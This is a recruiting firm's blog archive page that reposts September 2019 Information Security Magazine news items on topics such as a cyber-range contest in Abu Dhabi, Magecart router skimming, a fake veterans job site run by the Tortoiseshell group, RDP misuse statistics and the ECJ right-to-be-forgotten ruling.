Intelligent Connections. Recruiting Integrity.
Call Us: 415-510-2973

Archive for September 2019

Cyber-battle Over Real Model City Planned for Abu Dhabi Security Conference

Cyber-battle Over Real Model City Planned for Abu Dhabi Security Conference

The daily war waged between cyber-criminals and security experts will be played out in miniature in Abu Dhabi next month using an accurate model of a real city.

As part of the week-long HITB + Cyber Week security conference taking place at the Emirates Palace October 12–17, The Standoff challenge will pit competing teams against each other in a cyber-fight to gain control over a miniature city's digital infrastructure. 

The simulated cyber-battle will take place in a live-fire environment, allowing players to develop valuable insight into vulnerabilities that could be exploited in a real-life cyber-attack. 

The model city has been created to feature technology in use in the critical infrastructure of an actual modern-day metropolis and has its own power plants, freight and passenger trains, banks, and petrochemical facilities. 

Red teams representing attackers will attempt to hack into the city's industrial control systems (ICS) and supervisory control and data acquisition equipment and take control of its traffic systems, electrical plants, and transportation services, while blue teams push back to defend the city's companies.

Under the competition's rules, the blue team will not be allowed any time to study the infrastructure, find weak points, pick attack detection tools, or apply fixes. Instead, they will jump straight into protecting vulnerable services that are about to be targeted by red teams.

Web-application firewall (WAF) rules, next-generation firewall (NGFW) policies, basic account management, and the ability to delete malicious payloads are the only tactics allowed in the blue team's defensive repertoire. Attackers are under no such constraints and can do what they like, provided they don't disturb the infrastructure needed to run the contest. 

Dhillon Kannabhiran, founder and CEO of Hack In The Box (HITB), said: "The Standoff is one of the most challenging attack and defense contests in the world, where teams are competing to find vulnerabilities and attack vectors in real-world critical infrastructure."

The Standoff's hackable city was designed by Positive Technologies as a fun way for cyber-professionals to hone the protection and monitoring skills they use when dealing with real-world cybersecurity problems.

Head of cyber-battle business development at Positive Technologies, Gregory Galkin, said: "We've been working on The Standoff for almost 10 years now. We started with specialized trainings for information security experts and CTF players, but then understood that bringing our expertise even closer to the realities of life is a must in order to maximize the cyber-battle's practical value."

Source: Information Security Magazine

Health Industry Cybersecurity Matrix Launched

Health Industry Cybersecurity Matrix Launched

America's Healthcare and Public Health Sector Coordinating Council (HSCC) has launched an information-sharing resource aimed at improving the cybersecurity of the healthcare sector.

The new Health Industry Cybersecurity Matrix of Information Sharing Organizations (HIC-MISO) helps users stay on top of the latest security threats by providing them with a convenient list of cybersecurity information-sharing organizations across the United States. 

Featured in the new matrix are details of more than 25 cybersecurity information-sharing organizations and their services, including nine resources geared specifically toward the healthcare industry and the security of medical devices. 

Each listing includes a description of the organization and its mission together with details about any areas of cybersecurity specialization and how much, if anything, they charge for the information they share. 

Errol Weiss, chief security officer of the Health Information Sharing and Analysis Center (H-ISAC) and co-chair of the HSCC Information Sharing Task Group that created the HIC-MISO toolkit, said: "Many health organizations are beginning to understand the importance of cybersecurity information sharing but don't know where to start.

"With cyber-attacks against health organizations increasing in number and severity, one of the most important things an enterprise can do is build awareness and preparedness through community engagement. The HIC-MISO points them in the right direction."

The launch of HIC-MISO follows a recommendation in a 2017 report by a Department of Health and Human Services advisory group, the Healthcare Industry Cybersecurity Task Force, to improve cybersecurity information sharing in the healthcare sector.

A key objective of the matrix is to make it easy for smaller healthcare organizations, which may lack the resources to implement a first-rate cybersecurity system, to engage with the cybersecurity information and defensive tips that are being shared. 

More help is on its way, according to Bill Hagestad, co-lead of the task group behind the new matrix.  

Hagestad said: "The Task Group recognized the broad range of budgets and capabilities across the sector, and accordingly we will begin work to supplement the HIC-MISO with a guide for how organizations can establish an information sharing management structure appropriate to their enterprise size, resources, and risk profile."

Source: Information Security Magazine

Texas Prepares to Implement Mandatory Cybersecurity Training for Government Employees

Texas Prepares to Implement Mandatory Cybersecurity Training for Government Employees

Preparations are underway in Texas to introduce mandatory annual cybersecurity training for nearly all government employees. 

The Lone Star State passed a House bill to introduce the cyber-safety training into law on June 14 of this year. As if to reinforce the need for Texas to protect itself from cyber-criminals, 23 local government entities in the state were targeted in a single coordinated ransomware attack just two months later.

On Monday, the Texas Department of Information Resources (DIR) announced that it was accepting applications to certify cybersecurity training programs. DIR, in consultation with the Texas Cybersecurity Council, is required to certify at least five cybersecurity training programs as required by the new legislation.

To be certified, a cybersecurity awareness training program must focus on forming habits and procedures that will help government employees protect information resources. The program must also teach best practices for detecting, assessing, reporting, and addressing information security threats. 

A spokesperson for DIR said: "DIR has worked with statewide stakeholders and the Texas Cybersecurity Council to develop detailed certification criteria and a systematic process for certifying cybersecurity programs. Once DIR certifies a minimum of five training programs, the list of programs will be published on the DIR website."

To be considered for inclusion on the very first list of certified training programs, applicants must submit their security-awareness training programs by Friday, October 4.  

The initial year of the mandatory training will be a rolling certification period, in which additional programs will be certified on a continuing basis. In subsequent years, companies that want to put forward their programs for certification will have to submit them within a designated time frame. To remain on the approved list, training programs will have to be resubmitted for certification annually.

Once the certified programs have been chosen, all mandated state and local government employees will have until June 14, 2020, to complete their cybersecurity training. 

In state agencies, the training will only be mandatory for elected or appointed officials and for employees who use a computer to complete at least 25 percent of their required duties. At local government entities, all elected officials and employees who have access to a local government computer system or database must complete the training.

Local governments can get around the obligatory training if they employ a dedicated information resources cybersecurity officer and have a cybersecurity training program in place already that satisfies the requirement. 

Source: Information Security Magazine

Secure DevOps Practices Expected to Increase for Cloud Apps

Secure DevOps Practices Expected to Increase for Cloud Apps

Very few companies are securing the majority of their cloud-native apps with DevSecOps practices, according to new research.

According to findings from ESG and Data Theorem, only 8% of companies are securing 75% or more of their cloud-native applications with DevSecOps practices today.

However, 68% of companies are expected to be securing 75% (or more) of their cloud-native applications with DevSecOps practices within two years. The research analyzed 371 responses, and according to Doug Cahill, senior analyst and group practice director of cybersecurity for ESG, while organizations have started, there is more work to be done when it comes to securing their cloud-native apps with the benefits DevSecOps offers.

He said: “Organizations should consider newer approaches to securing their cloud-native apps, particularly solutions that address API-related vulnerabilities, which tops respondents’ minds when identifying their top threat concern.

Doug Dooley, Data Theorem COO, said that as production workloads are shifting to public cloud platforms, and organizations are quickly adopting serverless functions, they need to understand the associated risks and new threat model they are facing, and the means of addressing cloud native and API risks.

Asked by Infosecurity if they are seeing more companies adopt DevSecOps practices at the moment, or planning to adopt that strategy, Dooley said that security automation is gaining momentum for apps that are run by DevOps teams.

“We are still a few years away before it’s completely mainstream,” he said. “The culture of enterprise security has been a bit reluctant to embrace automation, but it’s the only way the best security teams are keeping up with the pace of DevOps.”

In an email to Infosecurity, Jeff Williams, co-founder and CTO of Contrast Security, said that most organizations only secure a small percentage of their application portfolio (cloud native or not) and they typically use application security tools, techniques and practices on only 10-20% of their apps and APIs which are determined to be the “critical,” “external,” public facing, or privacy related apps.

“To help remedy this gap, DevSecOps practices and tools are rapidly being adopted,” Williams said. “However, there is also a disturbing trend to shove the same old AppSec tools onto development teams that don’t have the skills to use them effectively under the guise of ‘shifting left’. Real DevSecOps requires a fundamental change to the way application security work is performed.”

Regarding the increase from 8% to 68% of cloud native app teams practicing DevSecOps, Williams said it is possible, as cloud native apps are close to the ideal scenario for DevSecOps. “However, it won’t happen without hard work to transform the people, process and pipeline in these teams."

Source: Information Security Magazine

Magecart Group Goes After Commercial Router Users

Magecart Group Goes After Commercial Router Users

Security researchers have spotted a new tactic being trialed by Magecart hackers: targeting commercial grade routers to skim large volumes of card details.

Magecart is the generic name given to a number of groups using JavaScript code to covertly steal card details from users. The tried-and-tested technique used up until now involves injecting this code into a website’s payment page, either directly or through the compromise of a third-party provider.

However, according to IBM, Magecart Group 5 (MG5) is testing malicious code which could be injected into legitimate JavaScript loaded by Layer 7 routers.

These routers are typically used in venues such as airports, casinos and hotels to serve large numbers of users — theoretically giving the attackers a major haul of card details if they succeed.

“We believe that MG5 aims to find and infect web resources loaded by L7 routers with its malicious code, and possibly also inject malicious ads that captive users have to click on to eventually connect to the internet,” IBM said in its report.

“The compromise can therefore be two-fold: 1. Guest payment data can be stolen when they browse through a compromised router; 2. malicious content can be injected into web pages viewed by all connecting guest devices, including those who pay to use the internet and those connecting to hotels’ free Wi-Fi hot spots.”

IBM also claimed to have found evidence that MG5 had injected malicious digital skimming code into a popular open source mobile module which provides sliding features on devices. This kind of supply chain attack could result in spreading the code to all apps which unwittingly incorporate that module, in order to steal data en masse from users.

This is in keeping with MG5’s usual MO, which is to target larger numbers of victims by infecting third-party platforms, improving the ROI of attacks versus those such as the raids on BA and Newegg which targeted the website/e-commerce provider directly.

Source: Information Security Magazine

Cleverly Faked Website Targets US Veterans

Cleverly Faked Website Targets US Veterans

American military veterans on the hunt for a new job are the latest group to be targeted by bold new threat group Tortoiseshell.

The group, which was discovered earlier this month by researchers at Symantec, has been active since July 2018, primarily targeting IT providers in Saudi Arabia with a mix of customized and "common or garden" malware.

New intelligence published yesterday by Cisco Talos reveals that Tortoiseshell has refocused its criminal campaign to strike at targets in the United States. Talos discovered that team Tortoiseshell was behind a malicious website that has been cleverly crafted to resemble a legitimate recruitment site for US military veterans.

Users of the site hxxp://hiremilitaryheroes[.]com were prompted to download an app that in reality was a malware downloader that deployed malware and spyware. 

Warren Mercer, technical leader at Cisco Talos, told Infosecurity Magazine that the nature of the attack indicated that Tortoiseshell was hoping to ensnare active military personnel in addition to former servicemen. 

"As it seems they were targeting HR/recruitment efforts, it's possible they hoped to attack current military servicemen as well as current veterans."

Talos would not confirm or deny whether reports that Tortoiseshell is based in Iran are correct. However, what is clear is that should Tortoiseshell get its claws into active members of the military, the outcome could be potentially devastating. 

Mercer told Infosecurity Magazine: "Depending on the victim they are successful compromising, the level of detail/information they [Tortoiseshell] can obtain is very varied. 

"If Tortoiseshell successfully targeted a currently enlisted military professional with access to potentially confidential information, this could become very damaging to the parties involved."

Close attention had been paid to every detail of the malicious website to ensure that it closely mimicked a genuine site in its choice of name, imagery, and the style of language used. However, Mercer said that what might appear to be sophisticated actions by the group were more probably evidence of their dogged resolve. 

Commenting on the site's seemingly genuine appearance, Mercer told Infosecurity Magazine: "This isn’t suggestive of a sophisticated actor; it’s more indicative of a determined actor. They want to ensure that they remain as aligned as possible to their fake website, and the text, images, and domain name help with that."

In carrying out this latest attack, Tortoiseshell used the same backdoor method employed against its targets in the Middle East. Perhaps this reliance on the same tactics, techniques, and procedures (TTPs) will be the group's downfall. 

Source: Information Security Magazine

Access Rights Not Updated for 45% of Employees Who Change Roles

Access Rights Not Updated for 45% of Employees Who Change Roles

Almost half of employees who switch roles within a company retain unnecessary network access rights, according to the results of a new survey by IT software company Ivanti.

The online survey questioned 400 people, of whom 70% were IT professionals, about what happened in their company when new staff were onboarded and when current employees switched roles or were deprovisioned. 

Asked whether unnecessary access rights are removed when employees change roles, 45% of the respondents said "no." This statistic swells in importance when paired with the knowledge that more survey respondents worked for the government (14.5%) than for any other industry. 

When it came to the access rights of employees leaving for new pastures, 13% of those surveyed said that they were not confident that the last person to exit their organization no longer had access to the company's critical systems and information. Only 48% said they were "somewhat confident" that access had been blocked. 

Given what respondents thought their former coworkers might get up to, it's surprising that closer tabs weren't being kept on their access rights. When asked what security risks were a concern in relation to improperly deprovisioned employees, 38% said a leak of sensitive data, 26% feared a cybersecurity hack through an unmanaged account, and 24% were concerned about malicious data detection/theft. 

Perhaps the survey's most worrying finding was that 52% of respondents admitted that either they or somebody they knew still had access to a former employer’s applications and data.

Most of the respondents (84%) were based in the US, but the online survey was also completed by people in the Netherlands, the UK, and Canada. 

Senior director of information technology at Ivanti, Adam Jones, told Infosecurity Magazine: "If you don’t know where you are vulnerable, it creates big issues and problems, especially when people can access privileges they shouldn’t. It creates an opportunity for exploitation by cyber-criminals or disgruntled employees (malicious insiders)."

It isn't clear from the survey whether access rights are being mismanaged due to the absence of proper assignment and management processes or because the trouble isn't being taken to regularly monitor permissions and update them as necessary. 

"Essentially, manually monitoring these processes is a productivity vampire," said Jones. "People often fail to complete their manual checklists, and we’ve even heard of instances where HR terminates an employee and forgets to tell their IT team.  

"Make sure you have the tools to automate manual tasks, so that you can monitor just the exceptions for when something doesn’t go right." 

Source: Information Security Magazine

Malicious RDP Behavior Detected in 90% of Organizations

Malicious RDP Behavior Detected in 90% of Organizations

A new study has found that hackers are exploiting a popular remote working tool to attack almost all the companies that use it. 

The Remote Desktop Protocol (RDP) has become a virtually indispensable part of modern business operations, as it allows users to control systems from afar without losing any functionality. 

Research published today by Californian tech firm Vectra has revealed suspicious RDP behaviors in 90% of companies using RDP, with organizations in the manufacturing, finance and insurance, retail, government, and healthcare industries identified as being most at risk of attack.

Researchers used Vectra's Cognito platform to monitor metadata collected from network traffic between more than four million workloads and devices in customer cloud, data centers, and enterprise environments between January and June 2019. 

During the six-month period, the platform detected 26,800 suspicious RDP behaviors. However, more could have occurred, since Cognito was set up to spot only two specific incidences. The first is repeated failed attempts to establish an RDP connection to a workload or host, and the second is a successful connection with unusual characteristics; for example, a connection normally established via an English-character keyboard being made instead with a French keyboard. 

Manufacturing organizations had the highest rate of dodgy RDP detections, with mid-sized operations showing a detection rate twice as high as the industry's average, which was 10 detections per 10,000 workloads and devices.

Together, the finance and insurance, manufacturing, and retail industries accounted for 49.8% of all suspect RDP detections. 

Alarming as the findings are, they come as no surprise to Vectra's head of security, Chris Morales, who told Infosecurity Magazine: "RDP is so widely used in different organizations that a high rate of misuse is inevitable. It's used in multiple forms of attacks as attackers look to hide from detection.

"The rate of detection in the six-month period is consistent with what Vectra has monitored over an extended period of time. RDP is a regular occurrence in attacks and a staple tool of the attackers' toolkit."

Despite the cybersecurity risk posed by RDP, Morales foresees no sunset on the tool's use. He told Infosecurity Magazine: "The business value delivered by RDP will ensure its continued use, and it will therefore continue to represent significant risk as an exposed attack surface."

Asked if we should all ditch the internet and go back to using fax machines, Morales said: "I do not think so. We just need to be more diligent in how we use services and thoughtful in their implementation."

Source: Information Security Magazine

LORCA Launches Open Call for Fourth Cohort of Cybersecurity Innovators

LORCA Launches Open Call for Fourth Cohort of Cybersecurity Innovators

The London Office for Rapid Cybersecurity Advancement (LORCA) has announced the launch of its global open call for its fourth cohort of cyber-scaleups.

LORCA, launched in June 2018 and hosted at Plexal, an innovation center located in the Here East campus in London’s Queen Elizabeth Olympic Park, aims to bolster the UK’s cybersecurity sector and make the internet safer for everyone by supporting the most promising later-stage companies.

LORCA offers 12-month programs from which companies can benefit from a collaborative ecosystem of academia, innovators, government, investors and industry.

It has already welcomed three cohorts of companies into its previous programs, which have gone on to raise over £58m in investment and won 514 contracts.

LORCA is now inviting new applications based on three innovation themes, after consulting with industry leaders from various sectors about their most pressing cyber-challenges and the types of solutions they need from the market in the future.

The three themes are: connected economy, connected everything and connected everyone.

The latest cohort will receive bespoke support with scaling in the UK and abroad, as well as access to commercial and engineering experts through delivery partners Deloitte and the Centre for Secure Information Technologies (CSIT) at Queen’s University Belfast.

Saj Huq, program director, LORCA, said: “As technology increasingly impacts all aspects of business and society, it’s clear that a cybersecurity paradigm shift is needed. Now more than ever, we need to support the development of cutting-edge innovations across the board to help us lead safer digital lives, keep our infrastructure secure and protect our digital economy from complex and evolving cyber threats. Given its increasing significance within a world that is more connected by the day, cybersecurity has to be everywhere – and serve everyone.”

The deadline for applying is Monday November 4 2019, with full details available here.

Source: Information Security Magazine

Experts Question ECJ’s Right to be Forgotten Ruling

Experts Question ECJ’s Right to be Forgotten Ruling

Google’s victory in a landmark right to be forgotten case asks more questions than it answers, according to legal and technology experts.

The European Court of Justice (ECJ) ruled yesterday that the search giant only needs to remove links from its services inside the EU in order to comply with legitimate right to be forgotten/right to erasure requests.

French privacy regulator CNIL had demanded that Google remove links globally to pages containing false or damaging info on a person, in a case dating back to 2015.

Part of Google’s argument for not removing info outside the EU was that the law could be exploited by oppressive governments to cover up abuses and control the flow of information, much as China does with its Great Firewall censorship apparatus.

“Since 2014, we've worked hard to implement the right to be forgotten in Europe, and to strike a sensible balance between people's rights of access to information and privacy,” the search giant said of the result. "It's good to see that the court agreed with our arguments."

However, some argued that the ruling undermines the right to be forgotten by failing to institute the law globally.

“Google is normally able to detect visitors from Europe to its global search engines and block them from seeing certain web pages containing sensitive information about individuals from queries made using their names,” explained Simon Migliano, head of research at Top10VPN.

“However, anyone connected to a VPN server located outside Europe will evade such detection and be able to view those results regardless of any 'right to be forgotten' decision in place. This loophole highlights the significant limitations of geo-restricting contentious web content in this day and age.”

Mishcon de Reya data protection adviser, Jon Baines, added that there are still question marks over what happens to the UK if it leaves the EU without a deal.

“Will UK search engine domains retain links to information removed from EU search engine domains? Or might the UK decide ultimately to give effect to delinking decisions made in the EU? Private individuals, as well as businesses, will want urgent clarification on this from government,” he argued.

EU citizens have been able to request information on them be removed from the web since 2014. However, since then, the GDPR has made it easier for EU citizens to request that such information be expunged from the web, with its right to erasure clause. Providers have a month to respond to a verbal or written request.

Ron Moscona, a partner at international law firm Dorsey & Whitney, explained that the ruling has failed to add clarity on how and when the GDPR should be limited in scope to within the EU.

“The provisions of Article 3 of GDPR that define its territorial effect clearly extend the legal rights and obligations of GDPR, in many circumstances, to the processing of personal data outside the EU including by entities operating outside the EU,” he said.

“Today’s decision of the EU court does not address these broader territorial issues.”

Source: Information Security Magazine